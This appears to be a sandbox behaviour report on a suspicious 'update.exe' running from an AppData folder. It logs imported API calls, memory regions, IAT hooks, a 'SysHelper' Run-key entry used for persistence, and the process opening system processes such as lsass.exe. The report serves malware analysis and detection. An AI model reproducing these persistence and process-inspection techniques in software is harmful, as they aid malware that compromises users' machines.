Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x773f3ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x773f3f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x77412b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpW, address_out = 0x773f5929	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x773f192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x773f1700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x773f11c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x773f11a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x773f1222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x773f1856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x77409af0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x773f168c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x773f183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x7741828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x773f54ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x773f1410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x773f89b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x773f2d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringW, address_out = 0x773f3bca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetPriorityClass, address_out = 0x7740cf28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x773f1809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x773fdd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetExitCodeProcess, address_out = 0x7740174d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x7740d802	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x773f4950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x773f5558	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x773f4c6b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersion, address_out = 0x773f4467	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x773f11f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x773f34d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x773f53c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryA, address_out = 0x7741d526	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x77412a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FatalAppExitA, address_out = 0x77474691	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x7740ca5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x773f34b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x773f110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x773f3587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x773f14fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x773f11e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x773f49ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x773f1916	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x773f87c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x7741772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x773f51cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x773f51e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x773f3509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x773f1725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x773f4d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77ac45f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x773f3531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x773f58a6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x773f17b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x77497bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x773f1328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x7740c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleCtrlHandler, address_out = 0x773f8a09	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x773f34c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x773f495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x7741d1d4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77ad1f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x7741d1c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x7747454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x773f14c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x77abe026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x77417aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x773f469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x773f1946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77ab2270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77ab22b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77ac3002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x773f51b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x774740d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x773f4a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x773f7a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x773f14e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x773f1450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x773f17ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x773f4493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x773f179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x7741d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x773f5189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x773f4a5d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x77413102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x773f5235	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostQuitMessage, address_out = 0x75e69abb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadCursorW, address_out = 0x75e688f7	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = BeginPaint, address_out = 0x75e71361	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x75e67809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x75e6b17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = ShowWindow, address_out = 0x75e70dfb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = IsWindow, address_out = 0x75e67136	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x75e68a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UpdateWindow, address_out = 0x75e73559	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x77ac25dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x75e705ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostThreadMessageW, address_out = 0x75e68bff	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxW, address_out = 0x75ebfd3f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x75e6787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x75e69a55	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EndPaint, address_out = 0x75e71341	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SendMessageW, address_out = 0x75e69679	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMessageW, address_out = 0x75e678e2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CloseServiceHandle, address_out = 0x7573369c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x7572df14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetUserNameW, address_out = 0x7573157a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x7572df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x757314d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x7573469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x7572df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenSCManagerW, address_out = 0x7572ca64	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenServiceW, address_out = 0x7572ca4c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ControlService, address_out = 0x75747144	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x7573468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x7572df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = QueryServiceStatus, address_out = 0x75732a86	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x757346ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x7572e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetHashParam, address_out = 0x7572df7e	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x760317bf	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x7602e141	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = CommandLineToArgvW, address_out = 0x75fb9ee8	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x761e7078	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x75fc1e46	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitialize, address_out = 0x7582b636	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeSecurity, address_out = 0x75837259	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x758586d3	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75859d0b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 202, address_out = 0x7700fd6b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 2, address_out = 0x77004642	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x77003eae	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 8, address_out = 0x77003ed5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 6, address_out = 0x77003e59	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 200, address_out = 0x77003f21	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 12, address_out = 0x77005dee	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 201, address_out = 0x77004af8	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x75329263	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 12, address_out = 0x757db131	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 11, address_out = 0x757d311b	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 52, address_out = 0x757e7673	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsFree, address_out = 0x752c436b	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsQuery_W, address_out = 0x752d572c	1	Fn
Get Address	c:\windows\syswow64\msvcr100.dll	function = atexit, address_out = 0x7521c544	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x773f4d28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x7747410b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x77474195	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x773fd31f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x7740ee7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x77ad441c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x77afc50e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x77afc381	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x7740f088	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x77ae05d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x77afca24	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77ab0b8c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x77b6fde8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x77b01e1d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x77474761	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x7746cd11	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x7747424f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x774746b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x77486676	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x77474751	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x774865f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x774747c1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x774747e1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x774747f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x7740eee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcesses, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcessModules, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleBaseNameW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcesses, address_out = 0x770c1544	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcessModules, address_out = 0x770c1408	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleBaseNameW, address_out = 0x770c152c	1	Fn

System (46)

Operation	Additional Information	Count	Logfile
Sleep	duration = 1 milliseconds (0.001 seconds)	43	Fn
Get Time	type = System Time, time = 2018-11-19 13:57:20 (UTC)	1	Fn
Get Time	type = Ticks, time = 38220	1	Fn
Get Time	type = System Time, time = 2018-11-19 13:57:31 (UTC)	1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data

Process #20: update.exe

384

Information	Value
ID	#20
File Name	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --Service 2040 5sQa7p3KFH0h1EIQpNMDhhbQdqopHt59HIaPvsLC LsCOYLRYMkqjvfiCCakqofPJhgWeL5nBT09BhA40
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\
Monitor	Start Time: 00:02:02, Reason: Child Process
Unmonitor	End Time: 00:02:17, Reason: Self Terminated
Monitor Duration	00:00:15

OS Process Information

Information	Value
PID	0x494
Parent PID	0x7f8 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 4AC

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	r	-
private_0x0000000000210000	0x00210000	0x0025efff	Private Memory	rw	-
private_0x00000000002a0000	0x002a0000	0x0031ffff	Private Memory	rw	-
private_0x0000000000320000	0x00320000	0x003effff	Private Memory	rw	-
update.exe	0x00400000	0x0049afff	Memory Mapped File	rwx	... Region Actions Download Dump
private_0x00000000004a0000	0x004a0000	0x0057ffff	Private Memory	rw	-
private_0x00000000005a0000	0x005a0000	0x0069ffff	Private Memory	rw	-
private_0x00000000006a0000	0x006a0000	0x0078ffff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x007effff	Private Memory	rw	-
pagefile_0x00000000007f0000	0x007f0000	0x00977fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000980000	0x00980000	0x00b00fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000b10000	0x00b10000	0x01f0ffff	Pagefile Backed Memory	r	-
private_0x0000000001f10000	0x01f10000	0x0206ffff	Private Memory	rw	-
wow64win.dll	0x73ff0000	0x7404bfff	Memory Mapped File	rwx	-
msvcr100.dll	0x75200000	0x752befff	Memory Mapped File	rwx	-
dnsapi.dll	0x752c0000	0x75303fff	Memory Mapped File	rwx	-
winnsi.dll	0x75310000	0x75316fff	Memory Mapped File	rwx	-
iphlpapi.dll	0x75320000	0x7533bfff	Memory Mapped File	rwx	-
winmm.dll	0x75340000	0x75371fff	Memory Mapped File	rwx	-
mpr.dll	0x75380000	0x75391fff	Memory Mapped File	rwx	-
msimg32.dll	0x753a0000	0x753a4fff	Memory Mapped File	rwx	-
wow64cpu.dll	0x754a0000	0x754a7fff	Memory Mapped File	rwx	-
wow64.dll	0x754b0000	0x754eefff	Memory Mapped File	rwx	-
cryptbase.dll	0x755e0000	0x755ebfff	Memory Mapped File	rwx	-
sspicli.dll	0x755f0000	0x7564ffff	Memory Mapped File	rwx	-
msctf.dll	0x75650000	0x7571bfff	Memory Mapped File	rwx	-
advapi32.dll	0x75720000	0x757bffff	Memory Mapped File	rwx	-
ws2_32.dll	0x757d0000	0x75804fff	Memory Mapped File	rwx	-
ole32.dll	0x75810000	0x7596bfff	Memory Mapped File	rwx	-
msasn1.dll	0x75970000	0x7597bfff	Memory Mapped File	rwx	-
crypt32.dll	0x75980000	0x75a9cfff	Memory Mapped File	rwx	-
usp10.dll	0x75b30000	0x75bccfff	Memory Mapped File	rwx	-
wininet.dll	0x75bd0000	0x75cc4fff	Memory Mapped File	rwx	-
imm32.dll	0x75d30000	0x75d8ffff	Memory Mapped File	rwx	-
msvcrt.dll	0x75d90000	0x75e3bfff	Memory Mapped File	rwx	-
lpk.dll	0x75e40000	0x75e49fff	Memory Mapped File	rwx	-
user32.dll	0x75e50000	0x75f4ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x75f50000	0x75f95fff	Memory Mapped File	rwx	-
shell32.dll	0x75fa0000	0x76be9fff	Memory Mapped File	rwx	-
iertutil.dll	0x76c40000	0x76e3afff	Memory Mapped File	rwx	-
shlwapi.dll	0x76e40000	0x76e96fff	Memory Mapped File	rwx	-
sechost.dll	0x76ea0000	0x76eb8fff	Memory Mapped File	rwx	-
urlmon.dll	0x76ec0000	0x76ff5fff	Memory Mapped File	rwx	-
oleaut32.dll	0x77000000	0x7708efff	Memory Mapped File	rwx	-
psapi.dll	0x770c0000	0x770c4fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x77150000	0x7723ffff	Memory Mapped File	rwx	-
gdi32.dll	0x77290000	0x7731ffff	Memory Mapped File	rwx	-
kernel32.dll	0x773e0000	0x774effff	Memory Mapped File	rwx	-
private_0x0000000077690000	0x77690000	0x777aefff	Private Memory	rwx	-
private_0x00000000777b0000	0x777b0000	0x778a9fff	Private Memory	rwx	-
ntdll.dll	0x778b0000	0x77a58fff	Memory Mapped File	rwx	-
nsi.dll	0x77a60000	0x77a65fff	Memory Mapped File	rwx	-
ntdll.dll	0x77a90000	0x77c0ffff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
pagefile_0x00000000fffb0000	0xfffb0000	0xfffd2fff	Pagefile Backed Memory	r	-
private_0x00000000fffdb000	0xfffdb000	0xfffddfff	Private Memory	rw	-
private_0x00000000fffde000	0xfffde000	0xfffdefff	Private Memory	rw	-
private_0x00000000fffdf000	0xfffdf000	0xfffdffff	Private Memory	rw	-
private_0x00000000fffe0000	0xfffe0000	0x7fffffeffff	Private Memory	r	-

Hook Information

Type	Installer	Target	Size	Information	Actions
IAT	private_0x00000000005a0000:+0x13677	14. entry of update.exe	4 bytes	kernel32.dll:GetThreadSelectorEntry+0x0 now points to pagefile_0x0000000000b10000:+0x3677e8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005a0000:+0x13677	18. entry of update.exe	4 bytes	kernel32.dll:GetLastError+0x0 now points to pagefile_0x0000000000010000:+0x25d7	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005a0000:+0x13677	22. entry of update.exe	4 bytes	kernel32.dll:CompareStringW+0x0 now points to pagefile_0x0000000000b10000:+0x36c7e8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005a0000:+0x13677	24. entry of update.exe	4 bytes	kernel32.dll:GetLocaleInfoW+0x0 now points to pagefile_0x0000000000980000:+0xb0043	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005a0000:+0x13677	26. entry of update.exe	4 bytes	kernel32.dll:GetProcessHeap+0x0 now points to pagefile_0x0000000000010000:+0x25b7	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005a0000:+0x13677	37. entry of update.exe	4 bytes	kernel32.dll:FreeLibrary+0x0 now points to pagefile_0x0000000000b10000:+0x38be8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005a0000:+0x13677	64. entry of update.exe	4 bytes	kernel32.dll:MultiByteToWideChar+0x0 now points to pagefile_0x0000000000b10000:+0xc28d56	... Actions Go to Installer Region Go to Target Region

Host Behavior

File (6)

Operation	Filename	Additional Information	Count	Logfile
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	2	Fn
Open	STD_ERROR_HANDLE	-	2	Fn

Registry (2)

Operation	Key	Additional Information	Success	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-		1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --AutoStart, type = REG_EXPAND_SZ		1	Fn

Process (48)

Operation	Process	Additional Information	Count	Logfile
Open	System	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
